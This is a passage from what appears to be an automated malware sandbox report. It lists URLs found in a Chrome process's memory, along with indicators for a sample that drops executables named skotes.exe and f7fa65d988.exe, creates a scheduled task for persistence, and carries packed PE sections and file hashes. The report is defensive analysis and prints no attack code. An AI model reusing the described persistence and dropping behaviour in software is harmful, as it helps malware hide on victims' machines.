Source: chrome.exe, 00000009.00000002.2844379465.000028F0003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847082080.000028F000878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000009.00000002.2847082080.000028F000878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icondTripTime6
Source: chrome.exe, 00000009.00000003.2797054243.0000667800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000009.00000003.2797054243.0000667800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hjxf
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2797054243.0000667800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000009.00000003.2797054243.0000667800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000009.00000003.2797054243.0000667800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2833879347.000028F00000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000009.00000002.2845650113.000028F0005C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970forceContinuousRefreshOnSharedPresent
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000009.00000002.2853604760.0000667800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000009.00000002.2847903762.000028F000A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2852424294.0000667800238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853604760.0000667800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000009.00000002.2852424294.0000667800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardfx$
Source: chrome.exe, 00000009.00000002.2853604760.0000667800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardfxwZ
Source: chrome.exe, 00000009.00000002.2853604760.0000667800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000009.00000002.2853604760.0000667800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000009.00000003.2796250943.0000667800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2796578453.000066780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000009.00000003.2797871076.00006678006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000009.00000002.2853883790.000066780080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000009.00000002.2853681894.000066780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000009.00000002.2853566577.0000667800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000009.00000002.2838209809.000028F000330000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000009.00000002.2844379465.000028F0003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2834343603.000028F0000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000009.00000002.2847675953.000028F0009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000009.00000002.2848170055.000028F000AD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000009.00000002.2847675953.000028F0009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000009.00000002.2847675953.000028F0009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000009.00000002.2834089663.000028F000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000009.00000002.2847862323.000028F000A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000009.00000002.2847565153.000028F000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ww.google.com/
Source: chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000009.00000002.2845551588.000028F000590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000009.00000002.2848985821.000028F000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000009.00000002.2848985821.000028F000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000009.00000002.2846367779.000028F000704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845789225.000028F0005EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846073020.000028F00066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000009.00000002.2846882643.000028F00081C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847523740.000028F000968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847082080.000028F000878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847523740.000028F000968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847082080.000028F000878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000009.00000002.2847637335.000028F0009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845602419.000028F0005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoNames)
Source: chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000009.00000002.2848017138.000028F000A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000009.00000002.2833919397.000028F00001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845475003.000028F00056C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443

System Summary
barindex
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File dump: service123.exe.7.dr 234885120 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name: .rsrc
Source: f7fa65d988.exe.6.dr Static PE information: section name: .idata
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0096E530 6_2_0096E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009A78BB 6_2_009A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009A7049 6_2_009A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009A8860 6_2_009A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009A31A8 6_2_009A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00964DE0 6_2_00964DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009A2D10 6_2_009A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009A779B 6_2_009A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00964B30 6_2_00964B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00997F36 6_2_00997F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe FF7DC25CE280C034E4038D4EBC20560904CEEF62C9ADA19631C8F4A42183C98D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe FF7DC25CE280C034E4038D4EBC20560904CEEF62C9ADA19631C8F4A42183C98D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe E121118EB9676FFD4BEBCE8890B74D47DBD7051FCE8A9BC5DEA45552DCCDCF56
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: file.exe Static PE information: Section: rvvxjflc ZLIB complexity 0.9946319698610696
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: skotes.exe.0.dr Static PE information: Section: rvvxjflc ZLIB complexity 0.9946319698610696
